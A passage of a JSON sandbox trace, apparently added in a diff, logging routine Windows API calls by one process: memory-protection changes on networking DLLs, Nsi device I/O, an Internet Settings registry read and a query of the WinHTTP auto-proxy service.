"0x7703fdf4", + "category": "process", + "api": "NtProtectVirtualMemory", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "ProcessHandle", + "value": "0xffffffff" + }, + { + "name": "BaseAddress", + "value": "0x738ef000" + }, + { + "name": "ModuleName", + "value": "IPHLPAPI.DLL" + }, + { + "name": "NumberOfBytesProtected", + "value": "0x00001000" + }, + { + "name": "MemoryType", + "value": "0x00000000" + }, + { + "name": "NewAccessProtection", + "value": "0x00000002", + "pretty_value": "PAGE_READONLY" + }, + { + "name": "OldAccessProtection", + "value": "0x00000004", + "pretty_value": "PAGE_READWRITE" + }, + { + "name": "StackPivoted", + "value": "no" + } + ], + "repeated": 0, + "id": 1066 + }, + { + "timestamp": "2025-03-07 22:33:24,860", + "thread_id": "6332", + "caller": "0x756c7924", + "parentcaller": "0x7511c105", + "category": "system", + "api": "NtDuplicateObject", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "SourceProcessHandle", + "value": "0xffffffff" + }, + { + "name": "SourceHandle", + "value": "0xfffffffe" + }, + { + "name": "TargetProcessHandle", + "value": "0xffffffff" + }, + { + "name": "TargetHandle", + "value": "0x00000418" + }, + { + "name": "Options", + "value": "0x00000002" + } + ], + "repeated": 0, + "id": 1067 + }, + { + "timestamp": "2025-03-07 22:33:24,860", + "thread_id": "6332", + "caller": "0x756b6fdb", + "parentcaller": "0x756b6ade", + "category": "filesystem", + "api": "NtCreateFile", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "FileHandle", + "value": "0x00000430" + }, + { + "name": "DesiredAccess", + "value": "0x00100080", + "pretty_value": "FILE_READ_ATTRIBUTES|SYNCHRONIZE" + }, + { + "name": "FileName", + "value": "\\??\\Nsi" + }, + { + "name": "CreateDisposition", + "value": "1", + "pretty_value": "FILE_OPEN" + }, + { + "name": "ShareAccess", + "value": "3", + "pretty_value": "FILE_SHARE_READ|FILE_SHARE_WRITE" + }, + { + "name": "FileAttributes", + "value": "0x00000000" + }, + { + "name": "ExistedBefore", + "value": "no" + }, + { + "name": "StackPivoted", + "value": "no" + } + ], + "repeated": 0, + "id": 1068 + }, + { + "timestamp": "2025-03-07 22:33:24,860", + "thread_id": "6332", + "caller": "0x76041aad", + "parentcaller": "0x74631a69", + "category": "device", + "api": "NtDeviceIoControlFile", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "FileHandle", + "value": "0x00000430" + }, + { + "name": "IoControlCode", + "value": "0x0012000f" + }, + { + "name": "InputBuffer", + "value": "\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\xf0\\x11ct\\x08\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00h\\xfbW\\x05\\x08\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00" + }, + { + "name": "OutputBuffer", + "value": "\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\xf0\\x11ct\\x08\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00h\\xfbW\\x05\\x08\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00h\\x00\\x00\\x008\\x00\\x00\\x00\\xf0\\xfbW\\x05i\\x1act\\x01\\x00\\x00\\x00\\xf0\\x11ct\\x08\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00h\\xfbW\\x05\\x08\\x00\\x00\\x00" + } + ], + "repeated": 0, + "id": 1069 + }, + { + "timestamp": "2025-03-07 22:33:24,860", + "thread_id": "6332", + "caller": "0x756b8b4a", + "parentcaller": "0x76041ad2", + "category": "system", + "api": "NtClose", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "Handle", + "value": "0x00000434" + } + ], + "repeated": 0, + "id": 1070 + }, + { + "timestamp": "2025-03-07 22:33:24,860", + "thread_id": "6332", + "caller": "0x77057a99", + "parentcaller": "0x75122407", + "category": "process", + "api": "NtQueryInformationToken", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "TokenInformationClass", + "value": "29" + }, + { + "name": "TokenInformation", + "value": "\\x00\\x00\\x00\\x00" + } + ], + "repeated": 0, + "id": 1071 + }, + { + "timestamp": "2025-03-07 22:33:24,860", + "thread_id": "6332", + "caller": "0x756b8c89", + "parentcaller": "0x756b8be2", + "category": "system", + "api": "NtWaitForSingleObject", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "Handle", + "value": "0x00000434" + }, + { + "name": "Milliseconds", + "value": "18446744073709551615" + }, + { + "name": "Status", + "value": "Infinite" + } + ], + "repeated": 0, + "id": 1072 + }, + { + "timestamp": "2025-03-07 22:33:24,860", + "thread_id": "8196", + "caller": "0x770564c6", + "parentcaller": "0x770563d1", + "category": "threading", + "api": "NtTestAlert", + "status": true, + "return": "0x00000000", + "arguments": [], + "repeated": 0, + "id": 1073 + }, + { + "timestamp": "2025-03-07 22:33:24,860", + "thread_id": "8196", + "caller": "0x7703feff", + "parentcaller": "0x7703fdf4", + "category": "process", + "api": "NtProtectVirtualMemory", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "ProcessHandle", + "value": "0xffffffff" + }, + { + "name": "BaseAddress", + "value": "0x738ef000" + }, + { + "name": "ModuleName", + "value": "IPHLPAPI.DLL" + }, + { + "name": "NumberOfBytesProtected", + "value": "0x00001000" + }, + { + "name": "MemoryType", + "value": "0x00000000" + }, + { + "name": "NewAccessProtection", + "value": "0x00000004", + "pretty_value": "PAGE_READWRITE" + }, + { + "name": "OldAccessProtection", + "value": "0x00000002", + "pretty_value": "PAGE_READONLY" + }, + { + "name": "StackPivoted", + "value": "no" + } + ], + "repeated": 0, + "id": 1074 + }, + { + "timestamp": "2025-03-07 22:33:24,860", + "thread_id": "8196", + "caller": "0x7703ff34", + "parentcaller": "0x7703fdf4", + "category": "process", + "api": "NtProtectVirtualMemory", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "ProcessHandle", + "value": "0xffffffff" + }, + { + "name": "BaseAddress", + "value": "0x738ef000" + }, + { + "name": "ModuleName", + "value": "IPHLPAPI.DLL" + }, + { + "name": "NumberOfBytesProtected", + "value": "0x00001000" + }, + { + "name": "MemoryType", + "value": "0x00000000" + }, + { + "name": "NewAccessProtection", + "value": "0x00000002", + "pretty_value": "PAGE_READONLY" + }, + { + "name": "OldAccessProtection", + "value": "0x00000004", + "pretty_value": "PAGE_READWRITE" + }, + { + "name": "StackPivoted", + "value": "no" + } + ], + "repeated": 0, + "id": 1075 + }, + { + "timestamp": "2025-03-07 22:33:24,860", + "thread_id": "8196", + "caller": "0x76041941", + "parentcaller": "0x738c788a", + "category": "device", + "api": "NtDeviceIoControlFile", + "status": false, + "return": "0xffffffffc0000225", + "pretty_return": "NOT_FOUND", + "arguments": [ + { + "name": "FileHandle", + "value": "0x00000430" + }, + { + "name": "IoControlCode", + "value": "0x00120007" + }, + { + "name": "InputBuffer", + "value": "\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00H\\x1b\\x8cs\\x00\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x00\\x00\\x00\\x00X\\xf5k\\x058\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\xbc\\xf5k\\x05\\x04\\x00\\x00\\x00|\\x00\\x00\\x00" + }, + { + "name": "OutputBuffer", + "value": "" + } + ], + "repeated": 0, + "id": 1076 + }, + { + "timestamp": "2025-03-07 22:33:24,860", + "thread_id": "8196", + "caller": "0x756b8b4a", + "parentcaller": "0x76041966", + "category": "system", + "api": "NtClose", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "Handle", + "value": "0x0000043c" + } + ], + "repeated": 0, + "id": 1077 + }, + { + "timestamp": "2025-03-07 22:33:24,860", + "thread_id": "8196", + "caller": "0x76041941", + "parentcaller": "0x738c788a", + "category": "device", + "api": "NtDeviceIoControlFile", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "FileHandle", + "value": "0x00000430" + }, + { + "name": "IoControlCode", + "value": "0x00120007" + }, + { + "name": "InputBuffer", + "value": "\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00`\\x1b\\x8cs\\x00\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x00\\x00\\x00\\x00X\\xf5k\\x05 \\x00\\x00\\x00\\x01\\x00\\x00\\x00\\xbc\\xf5k\\x05\\x04\\x00\\x00\\x00X\\x00\\x00\\x00" + }, + { + "name": "OutputBuffer", + "value": "\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00`\\x1b\\x8cs\\x00\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x00\\x00\\x00\\x00X\\xf5k\\x05 \\x00\\x00\\x00\\x01\\x00\\x00\\x00\\xbc\\xf5k\\x05\\x04\\x00\\x00\\x00X\\x00\\x00\\x00\\x00\\x00\\x00\\x00P\\x00\\x00\\x00\\x98\\xf5k\\x05\\x8ax\\x8cs\\x01\\x00\\x00\\x00`\\x1b\\x8cs\\x00\\x00\\x00\\x00X\\xf5k\\x05" + } + ], + "repeated": 0, + "id": 1078 + }, + { + "timestamp": "2025-03-07 22:33:24,860", + "thread_id": "8196", + "caller": "0x756b8b4a", + "parentcaller": "0x76041966", + "category": "system", + "api": "NtClose", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "Handle", + "value": "0x0000043c" + } + ], + "repeated": 0, + "id": 1079 + }, + { + "timestamp": "2025-03-07 22:33:24,860", + "thread_id": "8196", + "caller": "0x76041941", + "parentcaller": "0x738c6889", + "category": "device", + "api": "NtDeviceIoControlFile", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "FileHandle", + "value": "0x00000430" + }, + { + "name": "IoControlCode", + "value": "0x00120007" + }, + { + "name": "InputBuffer", + "value": "\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x000\\x1b\\x8cs\\x02\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\xe9k\\x05\\x04\\x00\\x00\\x00\\x02\\x00\\x00\\x00p\\xf6k\\x05\\x08\\x00\\x00\\x00\\x00\\x00\\x00\\x00" + }, + { + "name": "OutputBuffer", + "value": "\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x000\\x1b\\x8cs\\x02\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\xe9k\\x05\\x04\\x00\\x00\\x00\\x02\\x00\\x00\\x00p\\xf6k\\x05\\x08\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00P\\x00\\x00\\x00\\xf8\\xe8k\\x05\\x89h\\x8cs\\x01\\x00\\x00\\x000\\x1b\\x8cs\\x02\\x00\\x00\\x00\\x00\\xe9k\\x05" + } + ], + "repeated": 0, + "id": 1080 + }, + { + "timestamp": "2025-03-07 22:33:24,860", + "thread_id": "8196", + "caller": "0x756b8b4a", + "parentcaller": "0x76041966", + "category": "system", + "api": "NtClose", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "Handle", + "value": "0x0000043c" + } + ], + "repeated": 0, + "id": 1081 + }, + { + "timestamp": "2025-03-07 22:33:24,860", + "thread_id": "8196", + "caller": "0x76041941", + "parentcaller": "0x738c631a", + "category": "device", + "api": "NtDeviceIoControlFile", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "FileHandle", + "value": "0x00000430" + }, + { + "name": "IoControlCode", + "value": "0x00120007" + }, + { + "name": "InputBuffer", + "value": "\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x000\\x1b\\x8cs\\x08\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00,\\xe9k\\x05\\x04\\x00\\x00\\x00\\x00\\x00\\x00\\x00" + }, + { + "name": "OutputBuffer", + "value": "\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x000\\x1b\\x8cs\\x08\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00,\\xe9k\\x05\\x04\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00P\\x00\\x00\\x00\\x98\\xf5k\\x05\\x1ac\\x8cs\\x01\\x00\\x00\\x000\\x1b\\x8cs\\x08\\x00\\x00\\x00\\x00\\x00\\x00\\x00" + } + ], + "repeated": 0, + "id": 1082 + }, + { + "timestamp": "2025-03-07 22:33:24,860", + "thread_id": "8196", + "caller": "0x756b8b4a", + "parentcaller": "0x76041966", + "category": "system", + "api": "NtClose", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "Handle", + "value": "0x0000043c" + } + ], + "repeated": 0, + "id": 1083 + }, + { + "timestamp": "2025-03-07 22:33:24,860", + "thread_id": "8196", + "caller": "0x76041aad", + "parentcaller": "0x738c6386", + "category": "device", + "api": "NtDeviceIoControlFile", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "FileHandle", + "value": "0x00000430" + }, + { + "name": "IoControlCode", + "value": "0x0012000f" + }, + { + "name": "InputBuffer", + "value": "\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x000\\x1b\\x8cs\\x01\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x00\\x00\\x00\\x00 \\xe9k\\x05\\x08\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\xb8\\xeek\\x05\\x90\\x02\\x00\\x00(\\xeak\\x058\\x02\\x00\\x00" + }, + { + "name": "OutputBuffer", + "value": "\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x000\\x1b\\x8cs\\x01\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x00\\x00\\x00\\x00 \\xe9k\\x05\\x08\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\xb8\\xeek\\x05\\x90\\x02\\x00\\x00(\\xeak\\x058\\x02\\x00\\x00\\x00\\x00\\x00\\x00h\\x00\\x00\\x008\\x00\\x00\\x00\\x98\\xf5k\\x05\\x86c\\x8cs\\x01\\x00\\x00\\x000\\x1b\\x8cs\\x01\\x00\\x00\\x00 \\xe9k\\x05\\x08\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00" + } + ], + "repeated": 0, + "id": 1084 + }, + { + "timestamp": "2025-03-07 22:33:24,860", + "thread_id": "8196", + "caller": "0x756b8b4a", + "parentcaller": "0x76041ad2", + "category": "system", + "api": "NtClose", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "Handle", + "value": "0x0000043c" + } + ], + "repeated": 0, + "id": 1085 + }, + { + "timestamp": "2025-03-07 22:33:24,860", + "thread_id": "8196", + "caller": "0x76041941", + "parentcaller": "0x738c631a", + "category": "device", + "api": "NtDeviceIoControlFile", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "FileHandle", + "value": "0x00000430" + }, + { + "name": "IoControlCode", + "value": "0x00120007" + }, + { + "name": "InputBuffer", + "value": "\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x000\\x1b\\x8cs\\x08\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x004\\xe9k\\x05\\x04\\x00\\x00\\x00\\x00\\x00\\x00\\x00" + }, + { + "name": "OutputBuffer", + "value": "\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x000\\x1b\\x8cs\\x08\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x004\\xe9k\\x05\\x04\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00P\\x00\\x00\\x00\\xa0\\xf5k\\x05\\x1ac\\x8cs\\x01\\x00\\x00\\x000\\x1b\\x8cs\\x08\\x00\\x00\\x00\\x00\\x00\\x00\\x00" + } + ], + "repeated": 0, + "id": 1086 + }, + { + "timestamp": "2025-03-07 22:33:24,860", + "thread_id": "8196", + "caller": "0x756b8b4a", + "parentcaller": "0x76041966", + "category": "system", + "api": "NtClose", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "Handle", + "value": "0x0000043c" + } + ], + "repeated": 0, + "id": 1087 + }, + { + "timestamp": "2025-03-07 22:33:24,860", + "thread_id": "1956", + "caller": "0x770564c6", + "parentcaller": "0x770563d1", + "category": "threading", + "api": "NtTestAlert", + "status": true, + "return": "0x00000000", + "arguments": [], + "repeated": 0, + "id": 1088 + }, + { + "timestamp": "2025-03-07 22:33:24,860", + "thread_id": "1956", + "caller": "0x756c7924", + "parentcaller": "0x7511c105", + "category": "system", + "api": "NtDuplicateObject", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "SourceProcessHandle", + "value": "0xffffffff" + }, + { + "name": "SourceHandle", + "value": "0xfffffffe" + }, + { + "name": "TargetProcessHandle", + "value": "0xffffffff" + }, + { + "name": "TargetHandle", + "value": "0x00000444" + }, + { + "name": "Options", + "value": "0x00000002" + } + ], + "repeated": 0, + "id": 1089 + }, + { + "timestamp": "2025-03-07 22:33:24,860", + "thread_id": "8196", + "caller": "0x76041aad", + "parentcaller": "0x738c6386", + "category": "device", + "api": "NtDeviceIoControlFile", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "FileHandle", + "value": "0x00000430" + }, + { + "name": "IoControlCode", + "value": "0x0012000f" + }, + { + "name": "InputBuffer", + "value": "\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x000\\x1b\\x8cs\\x00\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x00\\x00\\x00\\x00(\\xe9k\\x05\\x08\\x00\\x00\\x00P\\xf1k\\x05D\\x04\\x00\\x00X\\xe9k\\x05\\xd8\\x00\\x00\\x00h\\xeck\\x05X\\x02\\x00\\x00" + }, + { + "name": "OutputBuffer", + "value": "\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x000\\x1b\\x8cs\\x00\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x00\\x00\\x00\\x00(\\xe9k\\x05\\x08\\x00\\x00\\x00P\\xf1k\\x05D\\x04\\x00\\x00X\\xe9k\\x05\\xd8\\x00\\x00\\x00h\\xeck\\x05X\\x02\\x00\\x00\\x00\\x00\\x00\\x00h\\x00\\x00\\x008\\x00\\x00\\x00\\xa0\\xf5k\\x05\\x86c\\x8cs\\x01\\x00\\x00\\x000\\x1b\\x8cs\\x00\\x00\\x00\\x00(\\xe9k\\x05\\x08\\x00\\x00\\x00P\\xf1k\\x05D\\x04\\x00\\x00" + } + ], + "repeated": 0, + "id": 1090 + }, + { + "timestamp": "2025-03-07 22:33:24,860", + "thread_id": "8196", + "caller": "0x756b8b4a", + "parentcaller": "0x76041ad2", + "category": "system", + "api": "NtClose", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "Handle", + "value": "0x0000043c" + } + ], + "repeated": 0, + "id": 1091 + }, + { + "timestamp": "2025-03-07 22:33:24,860", + "thread_id": "8196", + "caller": "0x7335afe3", + "parentcaller": "0x7332fe9a", + "category": "system", + "api": "GetSystemTimeAsFileTime", + "status": true, + "return": "0x00000000", + "arguments": [], + "repeated": 0, + "id": 1092 + }, + { + "timestamp": "2025-03-07 22:33:24,860", + "thread_id": "8196", + "caller": "0x7703feff", + "parentcaller": "0x7703fdf4", + "category": "process", + "api": "NtProtectVirtualMemory", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "ProcessHandle", + "value": "0xffffffff" + }, + { + "name": "BaseAddress", + "value": "0x734a1000" + }, + { + "name": "ModuleName", + "value": "wininet.dll" + }, + { + "name": "NumberOfBytesProtected", + "value": "0x00001000" + }, + { + "name": "MemoryType", + "value": "0x00000000" + }, + { + "name": "NewAccessProtection", + "value": "0x00000004", + "pretty_value": "PAGE_READWRITE" + }, + { + "name": "OldAccessProtection", + "value": "0x00000002", + "pretty_value": "PAGE_READONLY" + }, + { + "name": "StackPivoted", + "value": "no" + } + ], + "repeated": 0, + "id": 1093 + }, + { + "timestamp": "2025-03-07 22:33:24,860", + "thread_id": "8196", + "caller": "0x7703ff34", + "parentcaller": "0x7703fdf4", + "category": "process", + "api": "NtProtectVirtualMemory", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "ProcessHandle", + "value": "0xffffffff" + }, + { + "name": "BaseAddress", + "value": "0x734a1000" + }, + { + "name": "ModuleName", + "value": "wininet.dll" + }, + { + "name": "NumberOfBytesProtected", + "value": "0x00001000" + }, + { + "name": "MemoryType", + "value": "0x00000000" + }, + { + "name": "NewAccessProtection", + "value": "0x00000002", + "pretty_value": "PAGE_READONLY" + }, + { + "name": "OldAccessProtection", + "value": "0x00000004", + "pretty_value": "PAGE_READWRITE" + }, + { + "name": "StackPivoted", + "value": "no" + } + ], + "repeated": 0, + "id": 1094 + }, + { + "timestamp": "2025-03-07 22:33:24,860", + "thread_id": "8196", + "caller": "0x756ad931", + "parentcaller": "0x756ad70b", + "category": "misc", + "api": "RtlSetCurrentTransaction", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "TransactionHandle", + "value": "0x00000000" + } + ], + "repeated": 1, + "id": 1095 + }, + { + "timestamp": "2025-03-07 22:33:24,860", + "thread_id": "8196", + "caller": "0x756fcf49", + "parentcaller": "0x756ad75e", + "category": "registry", + "api": "NtOpenKeyEx", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "KeyHandle", + "value": "0x0000043c" + }, + { + "name": "DesiredAccess", + "value": "0x00000001", + "pretty_value": "KEY_QUERY_VALUE" + }, + { + "name": "ObjectAttributesHandle", + "value": "0x0000027c" + }, + { + "name": "ObjectAttributesName", + "value": "Software\\Microsoft\\windows\\CurrentVersion\\Internet Settings" + }, + { + "name": "ObjectAttributes", + "value": "HKEY_CURRENT_USER\\Software\\Microsoft\\windows\\CurrentVersion\\Internet Settings" + } + ], + "repeated": 0, + "id": 1096 + }, + { + "timestamp": "2025-03-07 22:33:24,860", + "thread_id": "8196", + "caller": "0x756fc5aa", + "parentcaller": "0x756ad3b0", + "category": "registry", + "api": "NtQueryValueKey", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "KeyHandle", + "value": "0x0000043c" + }, + { + "name": "ValueName", + "value": "MigrateProxy" + }, + { + "name": "Type", + "value": "4", + "pretty_value": "REG_DWORD" + }, + { + "name": "Information", + "value": "1" + }, + { + "name": "FullName", + "value": "HKEY_CURRENT_USER\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\MigrateProxy" + } + ], + "repeated": 0, + "id": 1097 + }, + { + "timestamp": "2025-03-07 22:33:24,860", + "thread_id": "8196", + "caller": "0x756ae44b", + "parentcaller": "0x76d180c9", + "category": "system", + "api": "NtClose", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "Handle", + "value": "0x0000043c" + } + ], + "repeated": 0, + "id": 1098 + }, + { + "timestamp": "2025-03-07 22:33:24,860", + "thread_id": "8196", + "caller": "0x7703feff", + "parentcaller": "0x7703fdf4", + "category": "process", + "api": "NtProtectVirtualMemory", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "ProcessHandle", + "value": "0xffffffff" + }, + { + "name": "BaseAddress", + "value": "0x73a88000" + }, + { + "name": "ModuleName", + "value": "winhttp.dll" + }, + { + "name": "NumberOfBytesProtected", + "value": "0x00001000" + }, + { + "name": "MemoryType", + "value": "0x00000000" + }, + { + "name": "NewAccessProtection", + "value": "0x00000004", + "pretty_value": "PAGE_READWRITE" + }, + { + "name": "OldAccessProtection", + "value": "0x00000002", + "pretty_value": "PAGE_READONLY" + }, + { + "name": "StackPivoted", + "value": "no" + } + ], + "repeated": 0, + "id": 1099 + }, + { + "timestamp": "2025-03-07 22:33:24,860", + "thread_id": "8196", + "caller": "0x7703ff34", + "parentcaller": "0x7703fdf4", + "category": "process", + "api": "NtProtectVirtualMemory", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "ProcessHandle", + "value": "0xffffffff" + }, + { + "name": "BaseAddress", + "value": "0x73a88000" + }, + { + "name": "ModuleName", + "value": "winhttp.dll" + }, + { + "name": "NumberOfBytesProtected", + "value": "0x00001000" + }, + { + "name": "MemoryType", + "value": "0x00000000" + }, + { + "name": "NewAccessProtection", + "value": "0x00000002", + "pretty_value": "PAGE_READONLY" + }, + { + "name": "OldAccessProtection", + "value": "0x00000004", + "pretty_value": "PAGE_READWRITE" + }, + { + "name": "StackPivoted", + "value": "no" + } + ], + "repeated": 0, + "id": 1100 + }, + { + "timestamp": "2025-03-07 22:33:24,860", + "thread_id": "8196", + "caller": "0x73a0ed9e", + "parentcaller": "0x73a0eb97", + "category": "services", + "api": "OpenSCManagerW", + "status": true, + "return": "0x00744220", + "arguments": [ + { + "name": "MachineName", + "value": "" + }, + { + "name": "DatabaseName", + "value": "" + }, + { + "name": "DesiredAccess", + "value": "0x00000001", + "pretty_value": "SC_MANAGER_CONNECT" + } + ], + "repeated": 0, + "id": 1101 + }, + { + "timestamp": "2025-03-07 22:33:24,860", + "thread_id": "6332", + "caller": "0x756b8b4a", + "parentcaller": "0x74631d6b", + "category": "system", + "api": "NtClose", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "Handle", + "value": "0x00000434" + } + ], + "repeated": 0, + "id": 1102 + }, + { + "timestamp": "2025-03-07 22:33:24,860", + "thread_id": "6332", + "caller": "0x76041aad", + "parentcaller": "0x74631a69", + "category": "device", + "api": "NtDeviceIoControlFile", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "FileHandle", + "value": "0x00000430" + }, + { + "name": "IoControlCode", + "value": "0x0012000f" + }, + { + "name": "InputBuffer", + "value": "\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\xf0\\x11ct\\x08\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00h\\xfbW\\x05\\x08\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00" + }, + { + "name": "OutputBuffer", + "value": "\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\xf0\\x11ct\\x08\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00h\\xfbW\\x05\\x08\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00h\\x00\\x00\\x008\\x00\\x00\\x00\\xf0\\xfbW\\x05i\\x1act\\x01\\x00\\x00\\x00\\xf0\\x11ct\\x08\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00h\\xfbW\\x05\\x08\\x00\\x00\\x00" + } + ], + "repeated": 0, + "id": 1103 + }, + { + "timestamp": "2025-03-07 22:33:24,860", + "thread_id": "6332", + "caller": "0x756b8b4a", + "parentcaller": "0x76041ad2", + "category": "system", + "api": "NtClose", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "Handle", + "value": "0x00000434" + } + ], + "repeated": 0, + "id": 1104 + }, + { + "timestamp": "2025-03-07 22:33:24,860", + "thread_id": "8196", + "caller": "0x73a0edb9", + "parentcaller": "0x73a0eb97", + "category": "services", + "api": "OpenServiceW", + "status": true, + "return": "0x007440e0", + "arguments": [ + { + "name": "ServiceControlManager", + "value": "0x00744220" + }, + { + "name": "ServiceName", + "value": "WinHttpAutoProxySvc" + }, + { + "name": "DesiredAccess", + "value": "0x00000094", + "pretty_value": "SERVICE_QUERY_STATUS|SERVICE_START|SERVICE_INTERROGATE" + } + ], + "repeated": 0, + "id": 1105 + }, + { + "timestamp": "2025-03-07 22:33:24,860", + "thread_id": "6332", + "caller": "0x756b8c89", + "parentcaller": "0x756b8be2", + "category": "system", + "api": "NtWaitForSingleObject", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "Handle", + "value": "0x00000434" + }, + { + "name": "Milliseconds", + "value": "18446744073709551615" + }, + { + "name": "Status", + "value": "Infinite" + } + ], + "repeated": 0, + "id": 1106 + }, + { + "timestamp": "2025-03-07 22:33:24,860", + "thread_id": "8196", + "caller": "0x7703feff", + "parentcaller": "0x7703fdf4", + "category": "process", + "api": "NtProtectVirtualMemory", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "ProcessHandle", + "value": "0xffffffff" + }, + { + "name": "BaseAddress", + "value": "0x73a88000" + }, + { + "name": "ModuleName", + "value": "winhttp.dll" + }, + { + "name": "NumberOfBytesProtected", + "value": "0x00001000" + }, + { + "name": "MemoryType", + "value": "0x00000000" + }, + { + "name": "NewAccessProtection", + "value": "0x00000004", + "pretty_value": "PAGE_READWRITE" + }, + { + "name": "OldAccessProtection", + "value": "0x00000002", + "pretty_value": "PAGE_READONLY" + }, + { + "name": "StackPivoted", + "value": "no" + } + ], + "repeated": 0, + "id": 1107 + }, + { + "timestamp": "2025-03-07 22:33:24,860", + "thread_id": "8196", + "caller": "0x7703ff34", + "parentcaller": "0x7703fdf4", + 